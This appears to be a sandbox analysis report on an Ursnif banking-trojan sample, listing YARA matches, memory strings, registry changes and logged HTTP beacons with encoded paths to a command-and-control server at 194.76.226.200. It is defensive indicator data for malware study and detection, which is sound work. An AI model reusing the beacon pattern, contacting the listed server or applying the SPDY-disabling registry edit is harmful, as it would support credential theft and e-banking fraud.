Source: loaddll32.exe, 00000001.00000003.419223881.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.424590800.0000000006248000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.416179066.00000000064A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.416181802.0000000006078000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001F.00000003.463004006.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000020.00000003.461557697.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 0000000E.00000003.519774884.00000185EC638000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: loaddll32.exe, 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://curlmyip.net
Source: loaddll32.exe, 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://curlmyip.netJv1GYc8A8hCBIeVDfile://c:
Source: loaddll32.exe, 00000001.00000003.419223881.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.424590800.0000000006248000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.416179066.00000000064A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.416181802.0000000006078000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001F.00000003.463004006.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000020.00000003.461557697.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: loaddll32.exe, 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipinfo.io/ip

Source: global traffic	HTTP traffic detected: GET /drew/XCtMkJNFgr1wO/rqNQ0HN4/ZyJyvokVrq1cpfT_2FjRvTK/tLuchRhy61/VY2_2BDejax1_2FZ_/2B4hja3XPXEF/qOMgeh9PvPf/N8zQpyy6Zc5e9b/4QO0R4yS5UCD1QFYshJGy/yTzTKH0fh7Ht9Zwy/6rUgxnlS7Il_2Fi/FA0gREqRHLz3XsH5AC/GH2iS6XmT/92F7y362W9gTjtIUfvoo/J_2Bt2_2BThMLoUrTFI/Ys7KyYaIys_2B6FXPvybrX/6Ff.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/2f3T6_2Fldpw_2BA6Engti/ap9anBYrptHHy/xCGyvO5i/wYPccsVOVAKMkuNvsUxMYE4/RkZB4YqLqe/XacN1M_2FaB24Ib2R/hVRxOozHufuZ/c6WQY_2FOGu/wQlIyAdYSezuQl/ojNT2IxdKraylKm035Q_2/FdvJBuYlSvhCsegR/oboSzu_2BtJ_2BW/XMLPOefEKMYQuO_2B_/2FNWtFwdl/dQERZJKq6wr_2FxRn8R5/MLhj_2Fz9ge97_2BBFz/rUr1Agrx59/b.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/m0QZKcj4ankL3W/8FVzGu6iQpcBkrTN5v3eZ/A6WzaqZBs9gogbdq/m8YEYG_2B_2FLSM/NM7eY2w3b1aL2aX8An/zJ6Vy7aKV/77q51XwDss_2Bne92xk6/rrRqhSV7rhVbP2hjU6R/_2B0H8cg3MM0IyieU8GPC9/gTwDi0Qx4J0HW/gyC_2FqL/iUkABk5euk2dlDO3ecBxilL/xQJUPbO4iF/9AhmuI174lSXWne_2/Fo5eEhaaDB/xKb9szQ5MHJ/1.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/1sAtgPIBWWyXis_2FA/6GIdiDz41/F8DsJCsC5dAiiAp40xO_/2FPXx_2BF1qO46g3cTx/u5HuMo3uztxcUiL23t82FF/kkG2LxXPj08tg/H_2BJGnO/cP97dD1bDaB8ARH5ISgaEh8/3o1VSIlvAE/fAY7fRQsRaiXUwpok/xVsDrvhLU9b_/2FX5Wo3hVjQ/iMxJEhzERdYzAI/_2F44rqzPuWQ9p1F4Yhmb/gVtKSgiFTUu0Sz_2/FYShPBpN48b/U_2FavA.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/F2DN_2FU1e/fQ5u04QtqSS_2Fpez/wjKfLKebrhaF/MMToBjmjMxS/2NhI76XoCH_2F5/14TeSntbngCZZYLUNIrhm/x6MB8tXx2hU99kkL/VY0QQM3MDv5NCL1/6ydwr5AoPHPZyujorj/zsR7mWAsu/Dgwxr2J_2Bt6yrRwZsuj/G0YF7iDIM95RsJq2szP/8WMC9D3LjonMIPvdKF1kRz/NQS_2FA_2BozQ/hVadPzcD/tG9pjaS8y_2BWqM0wQM2d5M/W.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/SzHdMdWvg/8JrkfhvX1ImoPdiWmQP6/QNbELOUZkV6PJ_2F_2B/T_2FBOZzzLom_2BccXK2f_/2B4napL_2F34z/ZunofQOB/e8FUQk93KOWF2nr5L7lasmZ/NJz0CTr65M/vqC70qv5uFkSE3WWV/uzLbKezipUQb/EiDVCVAB9rI/YTJRJOijIzHReN/lOWZ3chpUTxk47un6IsE8/fGRw3zIlPFEXwpmw/KXHYTQF2fkI3XOU/3s8f8mWLipjSZC2MeH/eanpmASqD48wQWqOn/qyD.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/HzhM5fP5x43l7rSkYr8Y/jYk_2FxetzKCt9WlQ60/DHr3pyDc_2BukVZ7K3nBXi/MEA2Xn3fXlFfO/GgBWR09O/Z1DKEGLlegReZBua8Nnmy16/fhqdF_2Beg/hrDVYSGiYpSkF5kA7/KsGOnRLVKqBx/xsw07jdGhl6/opBuLWprNFNT7s/OVJpMrjpCjISLpLDnGaGt/ixsS7exYYQrwdM8F/_2FgW9_2FjtCahO/8Yp45dJrj8Sd2mVa6W/QapGna.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/q2MoEGVRNe15Nk60/LDrmU6_2F0GkU3d/_2F0Knrw_2BLeOfpGj/fbCS28O8a/HzEmaSZQ4r2vrrl3ds_2/FJYs8ohc9ZfX55MptAq/LUXti_2BtVHZBpG5bp31OD/nUDVndp9HwGDI/fdApFg3Y/hh5zxa6uVZWdnbZZ4Zw497E/am4BWYNw05/CiWFAq8EmF0WMEY2m/vQZOFYV25Mfi/UplJo0Tr14k/U65NpQlAx9OU47/ZEIy4h_2BMYYm16tA/UAd.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/S0hO4k1kNWmaIbAIKk6J/C6ltlnn67F9zU4319Wq/SHohWMCDfW7oiPhqwsiIKI/bmU8FVW7oRmBm/mR3BXgY_/2FBwUjw6HBJfko8dOlgJjVp/0AJ_2FHS_2/F6As3DqY8qnvNETrK/YeXgHXybA3MO/9wS_2FpxfKh/va60IJVV7f3myC/lkXy0Vd4C9gsuVelNEUUO/TZ36G6O4b_2Br5X5/Ty9Sl6i_2F9Ot_2/Fw5KU6KNbXI13KA_2B/fSlw9uxRZ/1GDQy2uvqr3Bg6MoNgQy/Xe_2F1.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/rBML1rj8uElJfatm/1XUPHcYedh6XQNG/RfzcEZujO75haDUuMp/MBSLanUya/vTUM6CjwjVB_2F1X1CjS/LV0aTkXgDCKfXT831Mw/iqWmLrFI0W1nnldmY0nQOm/5tR5VYVCXmkqO/7H59YBEK/Qx8N4StPVj2TG0lcxpPmDMJ/os_2F27yzy/K94E3NnjB3SOalL_2/B5phCQkfkmoU/vGkUfmn2z2D/bI_2FkP7bk5mb4/JjP_2B8QttRH66r/R92.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/qj8KFpDyUAB/xQ_2FW_2FRVQUR/xo7UR19sTv1fTteFGwviu/H1QAugjBS9BAganl/OqUmHFdTh92Mttp/bKzDAO3E0N_2BxZ1ow/sTpBKLA2p/6BUrMhtfsbHTEuRLWcq7/jTbARM2BAFwOLbLtYBa/i_2BLCetjq8jqUWnEo5XCb/sLP1ktID7e6VC/G3BV6Vkb/N29_2BJlXZ2HReVfDXYWlEP/mt9DueL_2F/NgPtBNn5wZiJtUInd/fWiE7TY0/hCY.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/GVxzdEn3rJxHPgJaE/ckcbKS4onbSJ/ZdlWFtgOHAM/pJGsS1vTtWNP8h/yNsXRCxcvAA6AXQPJwabF/oYnH6redQswcAwtL/rDlMsMT_2FoiQ_2/BdNrJdcFdtJq9vsrPj/Pi_2B3_2B/dnsHU70OV9c4KUJyE_2F/0ip_2FIZ7Wqza0Ho2lN/KYodlnq6PG5KK9SBFWXHj5/viPS4jjPVWzpA/_2B2JOAM/KOBPUpSnsG9auoSxo_2BhjX/PvM1mRJl_2/FaBIYOp1w1wVY3Kqd/ZfinCIlH/i.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected Ursnif

Source: Yara match	File source: 00000005.00000003.311254885.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.365747529.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318724371.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.461557697.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.319004486.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.463004006.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313620006.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318536421.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.461902284.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318886527.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310802933.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.419223881.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318950101.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318813278.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.357803374.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.416632245.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.360636522.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.462719900.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.311195582.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310405280.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.424590800.0000000006248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.310678862.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313789835.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.416948546.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.357904969.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.310826841.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.311031834.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.462876303.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.311387225.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.418907434.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.310564493.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.311048648.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.311384342.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.418190503.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.418488620.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318621591.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313081553.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.312190736.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310688564.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.358039219.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.311319683.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310571881.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.461973969.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.419037087.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310907059.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.359673745.0000000001F7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.312479873.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.370947214.000000000540C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.360822217.000000000536C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.416181802.0000000006078000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.319064007.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.463098635.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.310393039.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313276698.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313441363.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.312864720.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.416179066.00000000064A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.461743717.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.419113309.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6248, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6100, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4768, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5376, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 3360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 3088, type: MEMORYSTR

Creates a DirectInput object (often for capturing keystrokes)

Source: loaddll32.exe, 00000001.00000002.511144160.00000000012DB000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Yara detected Ursnif

Source: Yara match	File source: 00000005.00000003.311254885.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.365747529.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318724371.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.461557697.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.319004486.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.463004006.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313620006.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318536421.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.461902284.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318886527.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310802933.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.419223881.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318950101.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318813278.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.357803374.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.416632245.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.360636522.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.462719900.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.311195582.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310405280.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.424590800.0000000006248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.310678862.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313789835.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.416948546.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.357904969.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.310826841.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.311031834.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.462876303.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.311387225.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.418907434.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.310564493.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.311048648.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.311384342.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.418190503.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.418488620.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318621591.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313081553.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.312190736.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310688564.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.358039219.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.311319683.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310571881.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.461973969.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.419037087.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310907059.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.359673745.0000000001F7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.312479873.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.370947214.000000000540C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.360822217.000000000536C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.416181802.0000000006078000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.319064007.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.463098635.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.310393039.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313276698.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313441363.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.312864720.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.416179066.00000000064A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.461743717.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.419113309.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6248, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6100, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4768, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5376, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 3360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 3088, type: MEMORYSTR

Disables SPDY (HTTP compression, likely to perform web injects)

Source: C:\Windows\explorer.exe

Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_01C178F2 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,	1_2_01C178F2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_031F78F2 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,	3_2_031F78F2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010578F2 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,	5_2_010578F2

System Summary

Writes or reads registry keys via WMI

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
